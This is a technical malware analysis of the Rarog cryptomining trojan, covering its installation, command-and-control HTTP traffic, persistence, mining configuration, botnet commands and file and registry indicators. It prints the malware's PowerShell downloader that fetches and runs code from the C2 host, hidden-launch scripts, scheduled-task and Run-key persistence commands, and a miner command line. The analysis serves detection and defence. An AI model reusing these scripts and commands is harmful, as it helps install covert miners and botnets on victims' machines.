| 关联规则 | 关联知识 | 关联工具 | 关联文档 | 关联抓包 |
| 参考1(官网) | |
| 参考2 | |
| 参考3 |
Technical Malware Analysis [出自:jiwo.org]
The file with the following properties was used to conduct this analysis:
| MD5 | 15361551cb2f705f80e95cea6a2a7c04 |
| SHA1 | a388e464edeb8230adc955ed6a78540ed1433078 |
| SHA256 | 73222ff531ced249bf31f165777696bb20c42d2148938392335f97f5d937182a |
| Compile Time | 2018-03-17 16:36:18 UTC |
| PDB String | D:\Work\_Rarog\Release\Rarog.pdb |
When Rarog is initially executed, the malware will look for the existence of the following file:
- C:\ProgramData\MicrosoftCorporation\Windows\System32\Isass.exe
In the event this file is missing on the system, Rarog will enter its installation routine, which is outlined below.
Installation Routine
The installation routine begins by creating the following hidden directory path:
- C:\ProgramData\MicrosoftCorporation\Windows\System32\
It then copies itself to the directory above with a filename of ‘Isass.exe’. This newly copied file is then executed in a new process. After this takes place, the malware makes a HTTP POST request as follows:
|
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
|
POST /2.0/method/checkConnection HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 6.1) Rarog/5.0
Content-Length: 0
Host: api.polotreck[.]xyz
HTTP/1.1 200 OK
Server: nginx/1.13.9
Date: Tue, 20 Mar 2018 16:34:10 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 12
Connection: keep-alive
X-Powered-By: PHP/5.6.30-0+deb8u1
c3VjY2Vzcw==
|
The response of the above request is simply base64-encoded and decodes to ‘success’. The response is checked, and if the response of ‘success’ is received, the malware proceeds.
The malware makes the following request to determine if the C2 wishes the malware to spawn a fake error message box:
|
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
|
POST /2.0/method/error HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 6.1) Rarog/5.0
Content-Length: 9
Host: api.polotreck[.]xyz
profile=1
HTTP/1.1 200 OK
Server: nginx/1.13.9
Date: Tue, 20 Mar 2018 16:43:58 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 192
Connection: keep-alive
X-Powered-By: PHP/5.6.30-0+deb8u1
Vary: Accept-Encoding
MTsxO1N5c3RlbSBFcnJvcjtUaGUgcHJvZ3JhbSBjYW4ndCBzdGFydCBiZWNhdXNlIE1TVkNQMTEwLmRsbCBpcyBtaXNzaW5nIGZyb20geW91ciBjb21wdXRlci4gVHJ5IHJlaW5zdGFsbGluZyB0aGUgcHJvZ3JhbSB0byBmaXggdGhpcyBwcm9ibGVtLg==
|
The base64 response above decodes to the following:
“1;1;System Error;The program can’t start because MSVCP110.dll is missing from your computer. Try reinstalling the program to fix this problem.”
The response is split by ‘;’. The first parameter is hardcoded, while the second is used to specify the type of message box to display. The following options are provided:
| Parameter | MessageBox Option |
| 0 | No error message displayed. |
| 1 | A stop-sign icon appears in the message box. |
| 2 | A question-mark icon appears in the message box. |
| 3 | An exclamation-point icon appears in the message box. |
| 4 | An icon consisting of a lowercase letter i in a circle appears in the message box. |
The third parameter specifies the title of the message box, while the last parameter represents the message. Using the example previously, we are presented with the following message:
Figure 9 Fake error message box displayed by Rarog
Finally, Rarog will execute the following command, which will kill the current malware instance, and deleting it from disk.
|
1
|
cmd.exe /c taskkill /im 73222ff531ced249bf31f165777696bb20c42d2148938392335f97f5d937182a.exe /f & erase C:\Users\Administrato\Desktop\73222ff531ced249bf31f165777696bb20c42d2148938392335f97f5d937182a.exe & exit
|
Post-Installation Routine
After the installation routine completes and a new instance of Isass.exe is spawned, this new instance of Rarog will check for the existence of the following file:
- C:\ProgramData\{4FCEED6C-B7D9-405B-A844-C3DBF418BF87}\driver.dat
If this file does not exist, Rarog will create the necessary hidden directory structure, and make a series of HTTP POST requests. The first request will be to ‘/2.0/method/checkConnection’ to ensure the remote C2 server is alive. The second request is to the following:
|
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
|
POST /4.0/method/installSuccess HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 6.1) Rarog/5.0
Content-Length: 9
Host: api.polotreck[.]xyz
buildID=5.1&hwid={1efdb526-2d21-11e8-a30c-8c8590105ceb}&profile=1&os=Microsoft Windows 7 Ultimate &platform=x86&processor=Intel(R) Core(TM) i7-7700HQ CPU @ 2.80 GHz&videocard=VMware SVGA 3D
HTTP/1.1 200 OK
Server: nginx/1.13.9
Date: Tue, 20 Mar 2018 16:43:58 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 192
Connection: keep-alive
X-Powered-By: PHP/5.6.30-0+deb8u1
250
|
The response provided by the C2 server is the stored identifier of the victim within the C2 database. This number is stored in the ‘driver.dat’ file.
The following registry key is created to ensure Rarog persists across reboots:
|
1
|
HKCU\Software\Microsoft\Windows\CurrentVersion\Run\Windows_Antimalware_Host_Syst - C:\ProgramData\MicrosoftCorporation\Windows\System32\Isass.exe
|
The following hidden directory is created, and the following three files are written to this location:
C:\ProgramData\WindowsAppCertification\WindowHelperStorageHostSystemThread.ps1
C:\ProgramData\WindowsAppCertification\cert.cmd
C:\ProgramData\WindowsAppCertification\checker.vbs
The contents of WindowHelperStorageHostSystemThread.ps1 is as follows:
|
1
2
3
4
5
6
7
8
9
10
11
|
$path = 'C:\ProgramData\MicrosoftCorporation\Windows\System32\'
$fpath = $path + 'Isass.exe'
$furl = 'http://api.polotreck[.]xyz/2.0/method/update'
$isfile = Test-Path $fpath
if($isfile -eq 'True') {}
else{
New-Item -ItemType directory -Path $path
$WebClient = New-Object System.Net.WebClient
$WebClient.DownloadFile($furl,$fpath)
Start-Process -FilePath $fpath}
|
The contents of cert.cmd is as follows:
|
1
2
|
@echo off
powershell -WindowStyle Hidden -ExecutionPolicy Bypass -NoP -file C:\ProgramData\WindowsAppCertification\WindowHelperStorageHostSystemThread.ps1
|
The contents of checker.vbs is as follows:
|
1
2
|
Set WshShell = CreateObject("WScript.Shell")
WshShell.Run "C:\ProgramData\WindowsAppCertification\cert.cmd",0
|
The following command is executed to create a Scheduled Task to run the checker.vbs script periodically:
|
1
|
schtasks.exe /Create /SC MINUTE /MO 30 /TN "Windows_Antimalware_Host" /TR "C:\ProgramData\WindowsAppCertification\checker.vbs" /F
|
The following command is executed to create a Scheduled Task to run Isass.exe periodically:
|
1
|
schtasks.exe /Create /SC MINUTE /MO 5 /TN "Windows_Antimalware_Host_Systm" /TR "C:\ProgramData\MicrosoftCorporation\Windows\System32\Isass.exe" /F
|
Additionally, the following command is executed to generate a shortcut link in the victim’s startup folder:
|
1
|
cmd.exe /c echo Set oWS = WScript.CreateObject("WScript.Shell") > CreateShortcut.vbs & echo sLinkFile = "%USERPROFILE%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Isass.lnk" >> CreateShortcut.vbs & echo Set oLink = oWS.CreateShortcut(sLinkFile) >> CreateShortcut.vbs & echo oLink.TargetPath = "C:\ProgramData\MicrosoftCorporation\Windows\System32\Isass.exe" >> CreateShortcut.vbs & echo oLink.Save >> CreateShortcut.vbs & cscript CreateShortcut.vbs & del CreateShortcut.vbs
|
These various registry modifications, file modifications, and commands executed provides multiple ways for Rarog to persist on the system both across reboots, as well as in instances where the malware dies or is forcibly closed.
Rarog then makes the following POST request to ensure the ID exists on the remote C2 server:
|
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
|
POST /4.0/method/check HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 6.1) Rarog/5.0
Content-Length: 6
Host: api.polotreck[.]xyz
id=250
HTTP/1.1 200 OK
Server: nginx/1.13.10
Date: Tue, 20 Mar 2018 20:47:52 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 12
Connection: keep-alive
X-Powered-By: PHP/5.6.30-0+deb8u1
c3VjY2Vzcw==
|
Again, Rarog looks for a response of ‘success’. Rarog continues to make the following POST request:
|
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
|
POST /4.0/method/threads HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 6.1) Rarog/5.0
Content-Length: 0
Host: api.polotreck[.]xyz
HTTP/1.1 200 OK
Server: nginx/1.13.10
Date: Tue, 20 Mar 2018 20:49:46 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 16
Connection: keep-alive
X-Powered-By: PHP/5.6.30-0+deb8u1
MjsxOzE7MTsyOw==
|
The decoded response by the C2 server is ‘2;1;1;1;2;’. This data is split via ‘;’ and the values are used to indicate whether certain Rarog features are enabled or not. The value of ‘1’ represents ‘On’, while anything else represents ‘Off’.
| Position | Name | Description |
| 0 | USB Devices | Searches the machine for removable drives. Copies Rarog to the removable drive with the name of ‘autorun.exe’. Also creates an ‘autorun.inf’ file in the same directory, which will execute ‘autorun.exe’ when loaded. |
| 1 | Helpers | Creates the hidden ‘C:\ProgramData\MicrosoftCorporation\Windows\Helpers\’ directory, and copies Isass.exe to ‘SecurityHeaIthService.exe’, ‘SystemldleProcess.exe’, and ‘winIogon.exe’ in this directory. |
| 2 | Mining Status | Makes a POST request to ‘/2.0/method/get’ to retrieve a URL for a mining executable. This file is stored in the ‘C:\ProgramData\{CB28D9D3-6B5D-4AFA-BA37-B4AFAABF70B8}\’ directory. |
| 3 | Miners Killer | Makes a POST request to ‘/4.0/method/modules’. This provides a list of DLLs that are placed in the ‘C:\ProgramData\MicrosoftCorporation\Windows\Modules\’ folder. These DLLs are then loaded by Rarog. The DLLs in question are expected to have an export function named ‘Instance’. |
| 4 | Task Manager | This does not appear to be used by the malware. |
When the ‘Mining Status’ option is enabled, and a miner is successfully downloaded from a remote server, Rarog will make the following request to the C2 server:
|
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
|
POST /2.0/method/config HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 6.1) Rarog/5.0
Content-Length: 6
Host: api.polotreck[.]xyz
id=250
HTTP/1.1 200 OK
Server: nginx/1.13.10
Date: Wed, 21 Mar 2018 16:55:38 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 108
Connection: keep-alive
X-Powered-By: PHP/5.6.30-0+deb8u1
Vary: Accept-Encoding
LW8geG1yLnBvb2wubWluZXJnYXRlLmNvbTo0NTU2MCAtdSBtb3JlMnNldEBwcm90b25tYWlsLmNvbSAtcCB4IC1rIC10IHtUSFJFQURTfQ==
|
The response decodes to the following:
|
1
|
o xmr.pool.minergate[.]com:45560 -u more2set@protonmail[.]com -p x -k -t {THREADS}
|
These parameters will be supplied to the mining program upon execution. Prior to running the miner, Rarog will check the running processes on the system for the following strings. Should they be encountered, the processes will be killed, and the executable will be deleted from the system.
- minergate
- stratum
- cryptonight
- monerohash
- nicehash
- dwarfpool
- suprnova
- nanopool
- xmrpool
These strings represent common strings associated with mining pools used by individuals when mining various cryptocurrencies.
Rarog will make the following request to determine how much of a percentage of the victim’s CPU to use for mining:
|
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
|
POST /4.0/method/cores HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 6.1) Rarog/5.0
Content-Length: 6
Host: api.polotreck[.]xyz
id=250
HTTP/1.1 200 OK
Server: nginx/1.13.10
Date: Wed, 21 Mar 2018 17:03:18 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 4
Connection: keep-alive
X-Powered-By: PHP/5.6.30-0+deb8u1
NTA=
|
The response decodes to a value of ‘50’. Rarog continues to make a request to ‘/4.0/method/blacklist’ determine what processes should be blacklisted. The server in question did not have a configured blacklist, but an example of what may be returned is shown below:
|
1
|
dota2.exe;csgo.exe;WorldOfTanks.exe;TslGame.exe;gta5.exe;photoshop.exe;vegas_pro.exe;premier.exe;Prey.exe;Overwatch.exe;MK10.exe;Minecraft.exe;DiabloIII.exe;QuakeChampions.exe;Acrobat.exe;Acrord32.exe
|
This list represents common resource-intensive applications, such as games, that Rarog will continually monitor for. In the event such a program is running in the foreground, Rarog will suspend mining operations.
The malware then makes the following request to retrieve the amount of time that Rarog will sleep before mining on the target victim:
|
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
|
POST /2.0/method/delay HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 6.1) Rarog/5.0
Content-Length: 6
Host: api.polotreck[.]xyz
id=250
HTTP/1.1 200 OK
Server: nginx/1.13.10
Date: Wed, 21 Mar 2018 17:11:05 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 5
Connection: keep-alive
X-Powered-By: PHP/5.6.30-0+deb8u1
10000
|
Prior to continuing, Rarog will check the running processes on the system for the following common security applications, and will not proceed if found:
- NetMonitor
- Taskmgr.exe
- Process Killer
- KillProcess
- System Explorer
- AnVir
- Process Hacker
Rarog takes the previously collected CPU usage percentage and applies it against the number of CPUs found on the system. As an example, if a system had four CPU cores, and the setting was at 50%, Rarog could configure the miner to use 2 threads (0.5 x 4). The following mining command is executed by Rarog:
|
1
|
C:\ProgramData\{CB28D9D3-6B5D-4AFA-BA37-B4AFAABF70B8}\xmrig32.exe -o xmr.pool.minergate[.]com:45560 -u more2set@protonmail[.]com -p x -k -t 1
|
Botnet Functionality
Rarog will periodically make HTTP POST requests to the following:
|
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
|
POST /2.0/method/setOnline HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 6.1) Rarog/5.0
Content-Length: 16
Host: api.polotreck[.]xyz
id=250&build=5.1
HTTP/1.1 200 OK
Server: nginx/1.13.10
Date: Wed, 21 Mar 2018 17:28:27 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 0
Connection: keep-alive
X-Powered-By: PHP/5.6.30-0+deb8u1
|
This particular URI has the ability to provide additional tasks for Rarog to perform. The following list of supported commands are included:
| Command | Description |
| install | Download and execute specified file |
| open_url | Open the specified URL in browser |
| ddos | Perform DDoS operations against specified target |
| update | Update Rarog Trojan from specified URL |
| restart_bot | Restart Rarog Trojan |
| delete_bot | Delete Rarog Trojan |
SHA256 Hashes
For a full list of SHA256 hashes and their first encountered timestamp, please refer to the following file.
C2 Servers
For a full list of C2 servers and their first encountered timestamp, please refer to the following file.
File and Folder Artifacts
C:\ProgramData\MicrosoftCorporation\Windows\System32\
C:\ProgramData\MicrosoftCorporation\Windows\System32\Isass.exe
C:\ProgramData\MicrosoftCorporation\Windows\System32\_Isass.exe
C:\ProgramData\{4FCEED6C-B7D9-405B-A844-C3DBF418BF87}\
C:\ProgramData\{4FCEED6C-B7D9-405B-A844-C3DBF418BF87}\driver.dat
C:\ProgramData\WindowsAppCertification\
C:\ProgramData\WindowsAppCertification\WindowHelperStorageHostSystemThread.ps1
C:\ProgramData\WindowsAppCertification\cert.cmd
C:\ProgramData\WindowsAppCertification\checker.vbs
C:\ProgramData\MicrosoftCorporation\Windows\Helpers\
C:\ProgramData\MicrosoftCorporation\Windows\Helpers\SecurityHeaIthService.exe
C:\ProgramData\MicrosoftCorporation\Windows\Helpers\SystemldleProcess.exe
C:\ProgramData\MicrosoftCorporation\Windows\Helpers\winIogon.exe
C:\ProgramData\{CB28D9D3-6B5D-4AFA-BA37-B4AFAABF70B8}\
C:\ProgramData\MicrosoftCorporation\Windows\Modules
Registry Artifacts
HKCU\Software\Microsoft\Windows\CurrentVersion\Run\Windows_Antimalware_Host_Syst
